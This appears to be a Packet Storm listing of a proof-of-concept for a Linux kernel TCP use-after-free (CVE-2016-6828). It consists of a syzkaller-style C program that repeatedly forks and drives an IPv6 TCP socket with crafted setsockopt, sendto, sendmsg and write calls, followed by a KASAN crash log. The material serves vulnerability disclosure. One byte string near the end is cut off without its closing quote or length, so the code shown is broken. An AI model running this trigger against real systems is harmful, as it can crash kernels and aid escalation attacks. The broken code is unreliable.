Lucene search

K
packetstormMarco GrassiPACKETSTORM:139642
HistoryNov 09, 2016 - 12:00 a.m.

Linux Kernel TCP Related Read Use-After-Free

2016-11-0900:00:00
Marco Grassi
packetstormsecurity.com
49

0.0004 Low

EPSS

Percentile

13.0%

`// Source: https://marcograss.github.io/security/linux/2016/08/18/cve-2016-6828-linux-kernel-tcp-uaf.html  
  
// to build clang derp4.c -o derp4 -static  
  
#include <unistd.h>  
#include <sys/syscall.h>  
#include <string.h>  
#include <stdint.h>  
#include <pthread.h>  
#include <stdio.h>  
  
#ifndef SYS_mmap  
#define SYS_mmap 9  
#endif  
#ifndef SYS_socket  
#define SYS_socket 41  
#endif  
#ifndef SYS_bind  
#define SYS_bind 49  
#endif  
#ifndef SYS_sendto  
#define SYS_sendto 44  
#endif  
#ifndef SYS_setsockopt  
#define SYS_setsockopt 54  
#endif  
#ifndef SYS_dup  
#define SYS_dup 32  
#endif  
#ifndef SYS_sendmsg  
#define SYS_sendmsg 46  
#endif  
#ifndef SYS_recvfrom  
#define SYS_recvfrom 45  
#endif  
#ifndef SYS_write  
#define SYS_write 1  
#endif  
  
long r[62];  
  
  
int main(int argc, char **argv)  
{  
while (1) {  
pid_t pid = fork();  
  
if (pid == 0) {  
r[0] = syscall(SYS_mmap, 0x20000000ul, 0x20000ul, 0x3ul, 0x32ul, 0xfffffffffffffffful, 0x0ul);  
r[1] = syscall(SYS_socket, 0xaul, 0x1ul, 0x0ul, 0, 0, 0);  
memcpy((void*)0x20006000, "\x0a\x00\xab\x12\xc7\x17\x1c\x83\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x05\x4f\xdc\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 128);  
r[3] = syscall(SYS_bind, r[1], 0x20006000ul, 0x80ul, 0, 0, 0);  
r[4] = syscall(SYS_mmap, 0x20020000ul, 0x1000ul, 0x3ul, 0x32ul, 0xfffffffffffffffful, 0x0ul);  
memcpy((void*)0x20012f5a, "\x25\xf9\x1b\xd4\xeb\xf5\x39\x3c\xd5\x80\xf6\xf0\xd6\xe1\xff\x65\x30\x97\xac\xaf\x1b\xbc\xc8\xae\xa4\x1e\xab\xd8\x60\x51\xcb\x4b\xed\xae\xaa\x37\xda\x80\xf9\x06\xb8\x6b\xdf\x78\x0f\xd0\x87\xf2\x65\x5f\x5e\x85\xb5\x4d\x6b\x48\xff\xf3\x0d\x46\x1c\xe5\xa4\x48\x38\x78\x18\x71\x9b\x75\xc4\xc9\x77\xf2\xc4\x5f\x88\x8e\xd2\x8d\x97\x26\x56\x4c\x93\x31\xbc\x64\x22\xff\xdc\x68\x01\x74\x43\xea\x84\x6f\x1d\x90\xeb\x98\x6c\xe9\x1c\x3b\x72\xab\xa0\xb5\x5b\xe8\xee\xfb\xf3\x2d\x96\xa0\xd4\x13\x55\xbc\xd4\xe0\x41\xfd\x78\x7e\x90\xf9\x9f\x9c\x57\x32\x47\xf2\xcf\x7f\x4a\x7b\x79\x0a\xdd\xb4\xce\xbd\x0b\x44\x02\x95\x0f\xaf\x50\xff\x87\x90\x09\xaa\x94\x01\x41\x43\x08\x8e\xb1", 165);  
memcpy((void*)0x20020000, "\x0a\x00\xab\x12\x0d\xf5\xba\x69\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xac\xad\xce\xa0", 28);  
r[7] = syscall(SYS_sendto, r[1], 0x20012f5aul, 0xa5ul, 0x249e4e54fe149d8cul, 0x20020000ul, 0x1cul);  
*(uint32_t*)0x20001fff = (uint32_t)0x2;  
r[9] = syscall(SYS_setsockopt, r[1], 0x1ul, 0x8ul, 0x20001ffful, 0x4ul, 0);  
r[10] = syscall(SYS_dup, r[1], 0, 0, 0, 0, 0);  
*(uint32_t*)0x20018000 = (uint32_t)0x4;  
r[12] = syscall(SYS_setsockopt, r[1], 0x29ul, 0xbul, 0x20018000ul, 0x4ul, 0);  
*(uint64_t*)0x2000dfc8 = (uint64_t)0x2000e000;  
*(uint32_t*)0x2000dfd0 = (uint32_t)0xc;  
*(uint64_t*)0x2000dfd8 = (uint64_t)0x20000000;  
*(uint64_t*)0x2000dfe0 = (uint64_t)0x1;  
*(uint64_t*)0x2000dfe8 = (uint64_t)0x0;  
*(uint64_t*)0x2000dff0 = (uint64_t)0x0;  
*(uint32_t*)0x2000dff8 = (uint32_t)0x4;  
*(uint16_t*)0x2000e000 = (uint16_t)0x0;  
*(uint16_t*)0x2000e002 = (uint16_t)0x0;  
*(uint32_t*)0x2000e004 = (uint32_t)0xffff;  
*(uint32_t*)0x2000e008 = (uint32_t)0x401;  
*(uint64_t*)0x20000000 = (uint64_t)0x2000ed3a;  
*(uint64_t*)0x20000008 = (uint64_t)0x37;  
*(uint32_t*)0x2000ed3a = (uint32_t)0x14;  
*(uint16_t*)0x2000ed3e = (uint16_t)0x2;  
*(uint16_t*)0x2000ed40 = (uint16_t)0x12;  
*(uint32_t*)0x2000ed42 = (uint32_t)0x1f;  
*(uint32_t*)0x2000ed46 = (uint32_t)0x7;  
*(uint8_t*)0x2000ed4a = (uint8_t)0x6;  
*(uint8_t*)0x2000ed4b = (uint8_t)0x100;  
*(uint8_t*)0x2000ed4c = (uint8_t)0x3f;  
*(uint32_t*)0x2000ed4d = (uint32_t)0x11;  
*(uint16_t*)0x2000ed51 = (uint16_t)0x0;  
*(uint16_t*)0x2000ed53 = (uint16_t)0x808;  
*(uint32_t*)0x2000ed55 = (uint32_t)0x1;  
*(uint32_t*)0x2000ed59 = (uint32_t)0x0;  
*(uint8_t*)0x2000ed5d = (uint8_t)0x0;  
*(uint32_t*)0x2000ed5e = (uint32_t)0x12;  
*(uint16_t*)0x2000ed62 = (uint16_t)0x2ea;  
*(uint16_t*)0x2000ed64 = (uint16_t)0x200;  
*(uint32_t*)0x2000ed66 = (uint32_t)0x5;  
*(uint32_t*)0x2000ed6a = (uint32_t)0xffffffffffffffff;  
*(uint8_t*)0x2000ed6e = (uint8_t)0x9;  
*(uint8_t*)0x2000ed6f = (uint8_t)0x1;  
r[47] = syscall(SYS_sendmsg, r[10], 0x2000dfc8ul, 0x801ul, 0, 0, 0);  
*(uint16_t*)0x20001003 = (uint16_t)0x1;  
*(uint8_t*)0x20001005 = (uint8_t)0x0;  
*(uint32_t*)0x20001007 = (uint32_t)0x9;  
r[51] = syscall(SYS_recvfrom, r[10], 0x20014a91ul, 0xdeul, 0x0ul, 0x20000ffbul, 0x8ul);  
memcpy((void*)0x20015285, "\xed\xe0\xf1\x03\xbd\x1d\xe2\x8d\x13\x62\xc9\x11\xde\x3b\x55\xb1\xb2\x26\x95\xb2\x3f\x32\x96\x8a\x3d\xf7\xd4\x2c\xd9\x32\xae\x05\x9a\x60\x09\xbc\x49\x63\x6a\x45\xd5\x6f\xa8\x4b\xaf\x8a\x66\xf3\x35\xad\xe6\x68\x85\xd4\x7e\xe5\x7c\x7e\x06\xbf\x32\xfb\xf9\xd2\x9f\x40\xa3\x0a\xa0\x93\x09\x73\x39\x7d\xac\x3c\x8d\x83\xe0\x0c\x5e\xa2\x36\x9b\x9c\xb4\x62\xe8\x39\x07\xd8\x71\xc1\x2f\x6f\x18\xfa\x8a\x5d\x06\xb4\x46\xa2\x97\x79\x81\xb2\x85\xd4\x4f\x6b\x48\xc4\xf5\xdd\xa8\x8d\x10\x74\x01\xe1\x58\xb2\x82\x72\xc4\xb6\xb2\xf7\xaa\x90\x9c\x9f\x61\x95\x87\x7b\x99\xc5\xa5\x53\xbc\xab\xdb\xdb\x5e\x32\xb8\xc3\xee\xd3\xda\x7a\xf2\x5c\xc5\x1a\xf1\xd6\x1b\x53\xad\x24\xd0\xa0\xc0\x0d\x73\x9e\x81\x7e\x4e\x82\xf5\xa9\x73\x3c\x7a\x5c\x6e\x4c\x48\x7d\x42\xf5\x2f\x68\xf9\x7e\xa9\xd8\x6a\x64\x78\x08\x7a\x37\xe9\xd3\x81\x15\x34\x63\x63\x14\xb7\x1a\x43\x9b\x4f\x85\xfa\x88\x5c\xe1\x1e\xce\x87\x95\xe1\x81\xc8\x06\xaf\x1a\x64\x26\x36\x83\x36\xef\x71\x0c\x2a\xda\xe4\xff\xa1\x87\xc2\x04\x96\x1c\x72\xd9\x2d\xf0\xce\x46\xd4\x3a\xd1\xc7\x2f\x60\x25\xf8\x33\x1f\x38\x7a\x46\xb1\x43\xa4\xd2\x65\x77\x47\x85\xe9\xad\x52\xdb\x8b\x93\x23\xf1\xf9\xa9\x5f\xe4\xf8\x39\x82\xc5\xb4\xe1\x5b\x87\xa0\xfd\x2c\xc2\x84\x15\x78\xaa\x9b\x3f\xe5\x75\x6e\x05\xef\x84\x4c\x6b\x9d\x1d\x9e\x7c\x92\x3b\x55\xcb\x01\x6f\xc5\x9a\xd8\xc3\x91\x39\x95\xd7\x8f\xe9\x87\x15\x27\xe7\x19\xa8\x18\x24\xfd\x09\x11\x49\x41\xc6\xd2\xe9\x1a\xf4\xb0\x9b\x85\x9b\x3f\xb1\xf3\xc3\x48\xc5\xe7\x45\x0b\x21\x2d\x32\x27\x92\x3c\x39\x52\x0f\x2b\xdf\x52\x66\x6f\x01\x8f\xdc\xfa\x8f\x5e\x53\xb7\x82\x23\x79\xfa\x28\xe5\x24\xa7\x5e\x2a\x24\x7e\xd0\x1e\xd5\x1a\xb6\xb8\xe5\xb2\x6d\x4d\x38\x61\x79\xb8\xd1\x27\x92\x63\x0c\xed\x3c\xf1\x13\x98\x37\xfa\x98\xda\x0c\x1a\x86\xd1\x6a\x12\x86\x2f\xd0\x8d\x8e\x2e\x52\x23\xac\x2d\x82\x59\xef\x17\xbc\xf1\x47\xfb\xf0\x5f\x43\x70\x99\x14\xdf\xaf\x44\x02\xb5\xe9\x39\x51\x8e\xf2\x07\x9c\xa2\x39\xab\x07\xa2\x22\xa7\xd3\x5c\xc0\x8c\xcf\x3c\xa2\xa7\xd0\xd6\xf4\x82\xcc\x35\x75\x3a\x20\xb7\x9b\xf3\x9d\xd9\xfe\xdf\x1e\x3f\x55\xf2\x99\xdb\xd0\xb2\xd7\x86\xc1\xfa\xb3\xc7\x99\xdc\x02\xe3\x9f\xfd\x1e\x56\xc1\xf2\x51\x32\x84\x61\x30\x33\xf6\xe3\x82\x9f\xf2\x04\xaf\x5d\xf4\x3d\xa6\x0e\x25\x53\xe9\x05\x7c\x42\xbf\xfa\x97\xd7\x77\x8c\x8f\x29\x7a\xcb\x40\x13\x07\xb5\x8d\x69\xdc\x8b\x35\xd3\xb6\xf3\xd8\x07\x94\x7e\x69\x0f\xb7\x28\xf1\xb3\x45\x60\x37\x65\xa4\xf6\xbf\x9c\xb3\xf9\x3d\xe1\x08\x08\xc9\x76\x5e\x8b\x7f\x26\x01\x9d\x8f\x15\x39\x02\xfe\x8a\xe3\x3b\x8b\xf9\xae\x06\x04\xef\x0d\xcf\x67\x24\x54\xe6\x4c\xe4\x05\x8e\xd7\xda\x4c\xf2\xd7\x88\x75\x87\xf7\x7e\xd0\x49\x19\x02\x5e\x00\xc4\xeb\x3e\xec\x70\x35\x9c\x9b\xc9\xd9\x47\x65\x4c\xa3\xdb\x0e\xde\x1e\x76\x58\x27\xe0\x91\x6b\xf9\x25\x44\xa6\xa2\x85\x8f\x50\xd0\x13\x88\x57\x25\x56\x78\xed\xcb\x6b\xec\xf2\x4f\xd4\xce\xf1\x90\xcd\x49\x50\xb5\xcf\xd3\x96\x4d\x3c\xf4\x54\x8e\xa9\xdb\xd3\xb5\x9e\xe9\x87\x19\x8b\x59\xd7\xf2\xcf\x1a\xd3\x70\xca\x42\xc6\x97\x66\x38\x24\x39\x4d\x42\xa1\xf0\x24\x46\xe4\x0e\x9c\xbc\xc4\x53\xa9\xb9\x94\x4d\xca\x48\xa6\x04\xb8\x2f\x4f\xf5\x85\x32\x22\xf8\x4e\x83\xab\x34\x27\x3b\x8f\x24\x48\x15\x9b\xa9\xf8\xb9\xb7\xcb\xd5\xfb\x72\xec\x7a\xc3\x39\x9c\xde\x25\x76\x08\x3f\x49\x35\xbd\x42\x4f\x3f\x5e\xfc\x6b\x6b\x9e\x3e\x34\x47\x62\xed\x5a\xae\xdc\xcf\x4e\xe6\x18\xfa\x7f\xe6\x46\xc8\xbe\xbc\x42\x88\xb6\xfe\xbd\x96\x85\x5a\x4a\x1d\xd2\x00\xe9\x71\x48\x48\x52\xd6\xf5\x88\x7d\x94\x18\xf6\xf0\x5c\x0a\x39\x29\xc8\x78\xa0\xa8\x44\xf4\xb6\xca\x78\x75\x4a\xf7\x53\xd7\x7e\x23\xaf\x6b\xf9\xcd\x77\xb2\xd0\x37\x29\x9c\x57\xbe\x9e\x5f\x7c\xe4\x41\x59\xde\xd5\x63\x02\x2a\xc0\x74\xa6\x00\xe2\x8f\x83\x30\xc1\x60\xcd\xb3\xca\x44\x1d\x88\x54\x8b\xbc\xa8\x79\x78\x86\xa2\x49\x7c\x94\x49\xf3\xb4\x41\x44\x76\x33\xf1\x2e\x71\xbc\xa1\x39\xb9\x68\x56\xd9\xa0\xa1\x6f\xdc\x7d\xa3\xb8\x4f\x1c\xb8\x19\x26\x42\x88\x0e\xcb\xbb\xc9\x6c\xa8\xf8\xe9\x37\x86\x61\x37\x9f\xba\xb3\x9e\x54\x07\xe6\xff\x6f\x54\x8c\xcf\x7e\x3d\x14\xfd\x94\xbb\xdc\x59\x5d\x22\x86\xb5\x3b\x18\x0d\x08\xad\x15\x67\x6b\xf1\xc8\xd8\x81\xac\x14\x63\xcf\x1e\xf9\x48\xba\xe0\x33\x4c\x1e\x72\xe9\x00\x1a\x48\xc5\xb4\x2c\x71\xd6\x7a\x0b\x8f\x6c\x02\x9a\x02\xa9\x20\xbd\x8a  
r[53] = syscall(SYS_sendto, r[10], 0x20015285ul, 0x1000ul, 0xc080ul, 0x0ul, 0x0ul);  
r[54] = syscall(SYS_mmap, 0x20022000ul, 0x1000ul, 0x3ul, 0x32ul, 0xfffffffffffffffful, 0x0ul);  
*(uint32_t*)0x20022fdd = (uint32_t)0x28;  
*(uint32_t*)0x20022fe1 = (uint32_t)0x400;  
*(uint64_t*)0x20022fe5 = (uint64_t)0x0;  
*(uint64_t*)0x20022fed = (uint64_t)0x8ab;  
*(uint64_t*)0x20022ff5 = (uint64_t)0xfffffffffffffffb;  
*(uint16_t*)0x20022ffd = (uint16_t)0x5;  
r[61] = syscall(SYS_write, r[10], 0x20022fddul, 0x28ul, 0, 0, 0);  
} else if (pid > 0) {  
int returnStatus;  
waitpid(pid, &returnStatus, 0);  
printf("collected child\n");  
} else {  
printf("fork failed\n");  
exit(1);  
}  
}  
return 0;  
}  
  
  
// KASAN report on v4.8-rc1, equivalent on master  
  
/*  
[ 21.446876] BUG: KASAN: use-after-free in tcp_xmit_retransmit_queue+0xc75/0xdb0 at addr ffff88007a06d428  
[ 21.447953] Read of size 4 by task rsyslogd/1612  
[ 21.448465] CPU: 0 PID: 1612 Comm: rsyslogd Tainted: G B 4.8.0-rc1 #1  
[ 21.449263] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014  
[ 21.450270] 0000000000000000 0000000015e55fbd ffff88007dc07268 ffffffff81bef151  
[ 21.451135] ffff88011cfb0d80 ffff88007a06d400 ffff88007a06d5a8 ffff88007a06d400  
[ 21.452002] ffff88007dc07290 ffffffff815d0351 ffff88007dc07328 ffff88007a06d400  
[ 21.452873] Call Trace:  
[ 21.453142] <IRQ> [<ffffffff81bef151>] dump_stack+0x83/0xb2  
[ 21.453835] [<ffffffff815d0351>] kasan_object_err+0x21/0x70  
[ 21.454450] [<ffffffff815d05f4>] kasan_report_error+0x204/0x500  
[ 21.455135] [<ffffffff815d0a31>] __asan_report_load4_noabort+0x61/0x70  
[ 21.455899] [<ffffffff82a90f55>] ? tcp_xmit_retransmit_queue+0xc75/0xdb0  
[ 21.456624] [<ffffffff82a90f55>] tcp_xmit_retransmit_queue+0xc75/0xdb0  
[ 21.457329] [<ffffffff82a53aba>] tcp_xmit_recovery.part.54+0x2a/0x120  
[ 21.458028] [<ffffffff82a69c96>] tcp_ack+0x2716/0x4ed0  
[ 21.458590] [<ffffffff815cf6e6>] ? save_stack+0x46/0xd0  
[ 21.459189] [<ffffffff815cf95d>] ? kasan_kmalloc+0xad/0xe0  
[ 21.459804] [<ffffffff82a67580>] ? tcp_fastretrans_alert+0x2dc0/0x2dc0  
[ 21.460540] [<ffffffff82a5a63f>] ? tcp_parse_options+0x18f/0xb20  
[ 21.461237] [<ffffffff811ea161>] ? ttwu_do_wakeup+0x21/0x2d0  
[ 21.461865] [<ffffffff82a6e8b1>] ? tcp_validate_incoming+0x821/0x1210  
[ 21.462581] [<ffffffff81c0e93e>] ? put_dec+0x2e/0xc0  
[ 21.463167] [<ffffffff82a74201>] tcp_rcv_established+0x5b1/0x20c0  
[ 21.463884] [<ffffffff815cfaa5>] ? memcpy+0x45/0x50  
[ 21.464414] [<ffffffff828ec80a>] ? __copy_skb_header+0x19a/0x1f0  
[ 21.465057] [<ffffffff82a73c50>] ? tcp_data_queue+0x4240/0x4240  
[ 21.465719] [<ffffffff828eca97>] ? __skb_clone+0x237/0x7a0  
[ 21.466326] [<ffffffff815cbed8>] ? kmem_cache_alloc+0xb8/0x1b0  
[ 21.466954] [<ffffffff82baa6b7>] ? rt6_check_expired+0xa7/0x120  
[ 21.467591] [<ffffffff82bae7f2>] ? ip6_dst_check+0x262/0x410  
[ 21.468231] [<ffffffff82c0ff52>] tcp_v6_do_rcv+0x642/0x13c0  
[ 21.468836] [<ffffffff82c148d2>] tcp_v6_rcv+0x1a32/0x2550  
[ 21.469462] [<ffffffff81233abb>] ? trigger_load_balance+0x3fb/0x8b0  
[ 21.470179] [<ffffffff82beaa55>] ? raw6_local_deliver+0x555/0x6f0  
[ 21.470953] [<ffffffff82b82dec>] ip6_input_finish+0x2ac/0xd50  
[ 21.471600] [<ffffffff82b8396a>] ip6_input+0xda/0x1f0  
[ 21.472149] [<ffffffff81117670>] ? kvm_guest_apic_eoi_write+0x70/0x90  
[ 21.472870] [<ffffffff82b83890>] ? ip6_input_finish+0xd50/0xd50  
[ 21.473521] [<ffffffff8128a722>] ? handle_fasteoi_irq+0x362/0x6a0  
[ 21.474210] [<ffffffff810f56c0>] ? ioapic_ir_ack_level+0xd0/0xd0  
[ 21.474858] [<ffffffff82b8291e>] ip6_rcv_finish+0x11e/0x340  
[ 21.475487] [<ffffffff82b84806>] ipv6_rcv+0xd86/0x1750  
[ 21.476043] [<ffffffff82b83a80>] ? ip6_input+0x1f0/0x1f0  
[ 21.476615] [<ffffffff82cadeb5>] ? _raw_spin_unlock_irqrestore+0x15/0x20  
[ 21.477332] [<ffffffff815d03d7>] ? kasan_end_report+0x37/0x50  
[ 21.478956] [<ffffffff815d0825>] ? kasan_report_error+0x435/0x500  
[ 21.479618] [<ffffffff82b83a80>] ? ip6_input+0x1f0/0x1f0  
[ 21.480250] [<ffffffff8293926f>] __netif_receive_skb_core+0x15df/0x26c0  
[ 21.481017] [<ffffffff812092c0>] ? update_curr+0x150/0x4e0  
[ 21.481700] [<ffffffff82937c90>] ? netdev_info+0x120/0x120  
[ 21.482339] [<ffffffff812bf12b>] ? hrtimer_active+0x1db/0x280  
[ 21.482969] [<ffffffff81206b3d>] ? cpu_load_update+0x1bd/0x350  
[ 21.483619] [<ffffffff81227f2c>] ? task_tick_fair+0x119c/0x2420  
[ 21.484295] [<ffffffff810fddf1>] ? __x2apic_send_IPI_dest.constprop.4+0x31/0x40  
[ 21.485101] [<ffffffff810fe072>] ? x2apic_send_IPI+0x72/0xa0  
[ 21.485739] [<ffffffff8293a37f>] __netif_receive_skb+0x2f/0x170  
[ 21.486383] [<ffffffff8293e1a7>] process_backlog+0x197/0x580  
[ 21.487021] [<ffffffff8293bc9a>] net_rx_action+0x6ca/0xbb0  
[ 21.487615] [<ffffffff8293b5d0>] ? sk_busy_loop+0x7b0/0x7b0  
[ 21.488258] [<ffffffff8111850e>] ? kvm_clock_get_cycles+0x1e/0x20  
[ 21.488909] [<ffffffff812d3e90>] ? ktime_get+0xb0/0x110  
[ 21.489471] [<ffffffff810fdc1b>] ? native_apic_msr_write+0x2b/0x30  
[ 21.490147] [<ffffffff812e3ca6>] ? clockevents_program_event+0x246/0x340  
[ 21.490868] [<ffffffff82cb121e>] __do_softirq+0x1ce/0x57d  
[ 21.491470] [<ffffffff811769d7>] irq_exit+0x117/0x140  
[ 21.492035] [<ffffffff82cb0dd0>] smp_apic_timer_interrupt+0x80/0xa0  
[ 21.492712] [<ffffffff82caf062>] apic_timer_interrupt+0x82/0x90  
[ 21.493378] <EOI> Object at ffff88007a06d400, in cache skbuff_fclone_cache size: 424  
[ 21.494277] Allocated:  
[ 21.494538] PID = 1711  
[ 21.494801] [<ffffffff810b308b>] save_stack_trace+0x2b/0x50  
[ 21.495416] [<ffffffff815cf6e6>] save_stack+0x46/0xd0  
[ 21.495970] [<ffffffff815cf95d>] kasan_kmalloc+0xad/0xe0  
[ 21.496572] [<ffffffff815cfe92>] kasan_slab_alloc+0x12/0x20  
[ 21.497185] [<ffffffff815cc51e>] kmem_cache_alloc_node+0xfe/0x1d0  
[ 21.497853] [<ffffffff828f21f2>] __alloc_skb+0xd2/0x5d0  
[ 21.498475] [<ffffffff82a480fd>] sk_stream_alloc_skb+0xbd/0x790  
[ 21.499129] [<ffffffff82a4b464>] tcp_sendmsg+0x13f4/0x2d10  
[ 21.499754] [<ffffffff82afb2ac>] inet_sendmsg+0x24c/0x350  
[ 21.500371] [<ffffffff828d58ef>] sock_sendmsg+0xcf/0x110  
[ 21.500988] [<ffffffff828d5b52>] sock_write_iter+0x222/0x3c0  
[ 21.501625] [<ffffffff8162d10b>] __vfs_write+0x3cb/0x640  
[ 21.502249] [<ffffffff8162e315>] vfs_write+0x175/0x4a0  
[ 21.502838] [<ffffffff81631b78>] SyS_write+0xd8/0x1b0  
[ 21.503429] [<ffffffff82cae476>] entry_SYSCALL_64_fastpath+0x1e/0xa8  
[ 21.504144] Freed:  
[ 21.504368] PID = 1711  
[ 21.504628] [<ffffffff810b308b>] save_stack_trace+0x2b/0x50  
[ 21.505290] [<ffffffff815cf6e6>] save_stack+0x46/0xd0  
[ 21.505879] [<ffffffff815cff13>] kasan_slab_free+0x73/0xc0  
[ 21.506501] [<ffffffff815cb70c>] kmem_cache_free+0x7c/0x210  
[ 21.507128] [<ffffffff828eba3b>] kfree_skbmem+0x7b/0xf0  
[ 21.507752] [<ffffffff828f3e22>] __kfree_skb+0x22/0x30  
[ 21.508339] [<ffffffff82a4b8ad>] tcp_sendmsg+0x183d/0x2d10  
[ 21.508962] [<ffffffff82afb2ac>] inet_sendmsg+0x24c/0x350  
[ 21.509574] [<ffffffff828d58ef>] sock_sendmsg+0xcf/0x110  
[ 21.510194] [<ffffffff828d5b52>] sock_write_iter+0x222/0x3c0  
[ 21.510818] [<ffffffff8162d10b>] __vfs_write+0x3cb/0x640  
[ 21.511408] [<ffffffff8162e315>] vfs_write+0x175/0x4a0  
[ 21.512003] [<ffffffff81631b78>] SyS_write+0xd8/0x1b0  
[ 21.512562] [<ffffffff82cae476>] entry_SYSCALL_64_fastpath+0x1e/0xa8  
[ 21.513258] Memory state around the buggy address:  
[ 21.513770] ffff88007a06d300: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  
[ 21.514546] ffff88007a06d380: 00 00 00 00 00 fc fc fc fc fc fc fc fc fc fc fc  
[ 21.515310] >ffff88007a06d400: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb  
[ 21.516114] ^  
[ 21.516611] ffff88007a06d480: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb  
[ 21.517400] ffff88007a06d500: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb  
[ 21.518203] ==================================================================  
*/  
  
  
`